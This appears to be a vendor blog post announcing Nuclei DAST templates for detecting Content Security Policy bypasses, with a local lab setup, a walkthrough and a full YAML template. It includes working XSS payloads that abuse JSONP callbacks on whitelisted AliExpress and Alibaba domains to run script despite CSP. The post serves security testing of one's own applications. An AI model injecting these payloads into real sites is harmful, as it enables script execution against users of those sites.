Blog
-

7 min read

CSP Bypass (DAST) - Nuclei Templates v10.1.5 🎉

CSP Bypass (DAST) - Nuclei Templates v10.1.5 🎉

Share

We're excited to introduce our new CSP Bypass (DAST) Templates designed to enhance security testing capabilities. This release enables comprehensive evaluation of Content Security Policy vulnerabilities and misconfigurations. In this post, we'll explore automating CSP Bypass Testing, creating custom security checks, and sharing results through the PDCP Cloud for efficient team collaboration.

For those specifically interested in using the CSP Bypass templates, you can jump directly to the end of the blog post.

We’ve introduced Nuclei templates in YAML format to make detecting Content Security Policy (CSP) bypasses easier and more efficient. These templates help security teams and bug hunters identify weak points in CSP implementations, highlighting areas where existing XSS vulnerabilities could be exploited due to misconfigurations.

By integrating these templates into Dynamic Application Security Testing (DAST) workflows, teams can assess CSP enforcement more effectively, uncover bypass scenarios, and strengthen overall web security defenses against potential attacks.

What are DAST Nuclei Templates?

DAST Nuclei Templates make dynamic security testing more efficient by scanning live applications for potential vulnerabilities. They give security researchers, penetration testers, and developers the flexibility to define custom HTTP requests, matchers, and payloads to test for security weaknesses. While traditionally used for identifying issues like SQL injection, XSS, and RCE, these templates also help analyze CSP enforcement, allowing teams to assess how security policies hold up against bypass attempts in real-world attack scenarios. By integrating these templates into DAST workflows, users can gain better visibility into misconfigurations and strengthen their application security.

DAST Nuclei templates provide a flexible, automated approach to dynamic testing, enabling users to customize their workflows for in-depth application security assessments. Explore the Fuzzing templates in our documentation for more details.

DAST templates can execute commands on hosts and are not included in default scans. To use these templates, you can run them by providing the
-dast flag.

What Is CSP Bypass?

  • CSP bypass occurs when an attacker circumvents Content Security Policy restrictions, potentially enabling them to execute unauthorized scripts or load malicious resources.
  • This type of vulnerability is common in web applications with improperly configured CSP headers and requires careful policy design and testing for effective prevention.

Steps to Setup Vulnerable CSP Bypass Lab

1. Clone the Repository:

bash

1git clone https://github.com/projectdiscovery/nuclei-templates-labs
  1. Navigate to the Directory:

bash

1cd dast/vulnerabilities/xss/csp

3. Start the Docker Container:

bash

1docker-compose up -d

In this example, we'll create a DAST template to detect Content Security Policy (CSP) bypass vulnerabilities via AliExpress ACS domains.We'll begin by identifying the CSP header that allows AliExpress ACS domains and then check for potential bypass conditions in the script-src directive.

/xss?payload=test - is the route where we can test for CSP bypass, with a response header containing Content-Security-Policy: default-src 'self'; script-src 'self' https://acs.aliexpress.com *.acs.aliexpress.com
  • Provide some random input in the payload field, it can be observed that the input is reflected as shown below.
  • When testing for a simple Basic XSS payload, <script>alert(document.domain)</script>, it successfully reflects in the application. However, in the browser, the JavaScript does not execute.
  • Upon inspecting the browser console, the following error message appears:
Refused to execute inline script because it violates the Content Security Policy (CSP). Either ‘unsafe-inline’, a hash, or a nonce is required.
  • This indicates that the application's Content Security Policy (CSP) restricts inline JavaScript execution, preventing the payload from running.

Bypassing CSP Using JSONP Exploitation

Since the application enforces a Content Security Policy (CSP) that blocks inline scripts, we need an alternative way to execute JavaScript. One common method is abusing JSONP endpoints if they exist on CSP-whitelisted domains.

Finding a CSP Bypass

  • While analyzing the CSP headers, we notice the following directive:

bash

1script-src 'self' https://acs.aliexpress.com *.aliexpress.com
  • This means the browser allows scripts from the application's domain (self) and https://acs.aliexpress.com along with its subdomains. If this domain hosts a JSONP-based API, we may be able to execute JavaScript using the callback parameter.

Payload for CSP Bypass

Use the following payload to execute JavaScript despite CSP restrictions:

bash

1<script src="https://acs.aliexpress.com/h5/mtop.aliexpress.address.shipto.division.get/1.0/?type=jsonp&dataType=jsonp&callback=alert"></script>

Why Does This Work?

1. CSP Allows External Scripts

  • The website enforces a CSP that includes:

bash

1script-src 'self' https://acs.aliexpress.com *.acs.aliexpress.com;
  • This policy allows scripts from https://acs.aliexpress.com and its subdomains to be executed without restriction.

2. JSONP Executes Arbitrary Callbacks

javascript

1alert({"some":"data"});
  • Since alert() is a valid JavaScript function, this will execute in the browser, confirming JavaScript execution despite CSP.

Crafting a CSP Bypass DAST Nuclei Template

Here’s the template for Content-Security-Policy Bypass via AliExpress ACS in DAST format

yaml

1id: alibaba-ug-csp-bypass
2
3info:
4  name: Content-Security-Policy Bypass via Alibaba UG
5  author: renniepak,DhiyaneshDK
6  severity: medium
7  reference:
8    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
9  metadata:
10    verified: true
11  tags: xss,csp-bypass,alibaba-ug
12
13flow: http(1) && headless(1)
14
15http:
16  - method: GET
17    path:
18      - "{{BaseURL}}"
19
20    matchers:
21      - type: word
22        part: header
23        words:
24          - "Content-Security-Policy"
25          - "alibaba.com"
26        condition: and
27        internal: true
28
29headless:
30  - steps:
31      - action: navigate
32        args:
33          url: "{{BaseURL}}"
34
35      - action: waitdialog
36        name: alibaba_ug_csp_xss
37        args:
38          max-duration: 5s
39
40    payloads:
41      injection:
42        - '<script src="https://ug.alibaba.com/api/ship/read?callback=alert"></script>'
43
44    fuzzing:
45      - part: query
46        type: replace
47        mode: single
48        fuzz:
49          - "{{url_encode(injection)}}"
50
51    matchers:
52      - type: dsl
53        dsl:
54          - "alibaba_ug_csp_xss == true"

HTTP Request Section

Step 1: Sending an HTTP Request to the Target

  • The template starts by making an HTTP GET request to the target URL.
  • This ensures the server responds with headers that include CSP directives and references to Alibaba.

yaml

1http:
2  - method: GET
3    path:
4      - "{{BaseURL}}"

Step 2: Validating CSP Presence

  • The response headers are analyzed to check if the Content-Security-Policy (CSP) exists.
  • The presence of "alibaba.com" in the response is also checked to confirm the domain's involvement.

yaml

1matchers:
2      - type: word
3        part: header
4        words:
5          - "Content-Security-Policy"
6          - "alibaba.com"
7        condition: and
8        internal: true

Step 3: Defining Execution Flow

  • The flow control ensures the HTTP request runs first (http(1)).
  • If the response contains a CSP header with Alibaba UG, the headless browser actions are executed (headless(1)).

yaml

1flow: http(1) && headless(1)

Headless Section Breakdown:

Step 4: Launching a Headless Browser

  • If the CSP header is present, the template starts a headless browser session.
  • The browser navigates to the target URL to simulate real user behavior.

yaml

1headless:
2  - steps:
3      - action: navigate
4        args:
5          url: "{{BaseURL}}"

Step 5: Monitoring for Alert Dialog

  • The template waits for a JavaScript alert box to appear.
  • If an alert box is triggered, it indicates that external JavaScript executed, confirming a CSP bypass.

yaml

1- action: waitdialog
2    name: alibaba_ug_csp_xss
3    args:
4      max-duration: 5s

Step 6: Injecting a CSP Bypass Payload

  • A malicious JSONP script from ug.alibaba.com is injected.
  • The script forces the page to load JavaScript from an external domain, bypassing CSP.

yaml

1payloads:
2  injection:
3    - '<script src="https://ug.alibaba.com/api/ship/read?callback=alert"></script>'

Step 7: Fuzzing Query Parameters

  • The template injects the payload into the target URL's query parameters in a URL-encoded format.
  • This tests if CSP restrictions can be bypassed using input manipulation.

yaml

1fuzzing:
2  - part: query
3    type: replace
4    mode: single
5    fuzz:
6      - "{{url_encode(injection)}}"

Step 8: Confirming CSP Bypass

  • If the alert box appears, it means external JavaScript executed successfully.
  • The matcher validates this execution and confirms a CSP bypass.

cli

1matchers:
2  - type: dsl
3    dsl:
4      - "alibaba_ug_csp_xss == true"

How to Run the CSP Bypass DAST Nuclei Templates ?

  • To run the DAST Nuclei template, use the following command:

bash

1nuclei -u "http://localhost:2002/xss?payload=test" -t aliexpress-acs-csp-bypass.yaml -dast -headless -vv
  • Make sure to use both -headless & -dast flags since the template is written in headless

Uploading Results to ProjectDiscovery Cloud Platform


To upload results to the cloud, you need to obtain an authentication token. Here are the steps to follow:

  1. Go to PDCP Cloud and log in to your account.
  2. Click on your profile picture in the top-right corner and select API key.
  3. Copy your API key, and in your terminal, type nuclei -auth <your-api-key>.

Now you're all set to run the templates!

bash

1nuclei -t dast/vulnerabilities/xss/csp-bypass -l input.txt -dast -headless -cloud-upload -vv

Now that you've gathered numerous findings, you can easily access them on the Cloud. Just log in to PDCP Cloud, and you'll see a scan created with your results.

We have written 204 templates for DAST CSP Bypass.

The CSP Bypass payloads used in this template are sourced from the CSPBypass repository maintained by renniepak. This repository documents various real-world techniques for bypassing Content Security Policy restrictions and executing unauthorized JavaScript.

Conclusion

The CSP Bypass (DAST) Nuclei templates offer a practical way to assess Content Security Policy (CSP) misconfigurations, helping security teams pinpoint gaps that could be exploited for CSP bypass. With headless browser automation and script injection techniques, these templates make it easier to identify weak policy implementations that might allow unauthorized JavaScript execution.

By integrating them into security workflows, organizations can proactively detect and fix CSP weaknesses, reducing the risk of XSS exploitation, data theft, and other client-side attacks before they become a threat.

You can also join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you, once again!

By leveraging Nuclei and actively engaging with the open-source community, or by becoming a part of the ProjectDiscovery Cloud Platform, companies can enhance their security measures, proactively address emerging threats, and establish a more secure digital landscape. Security represents a shared endeavor, and by collaborating, we can consistently adapt and confront the ever-evolving challenges posed by cyber threats.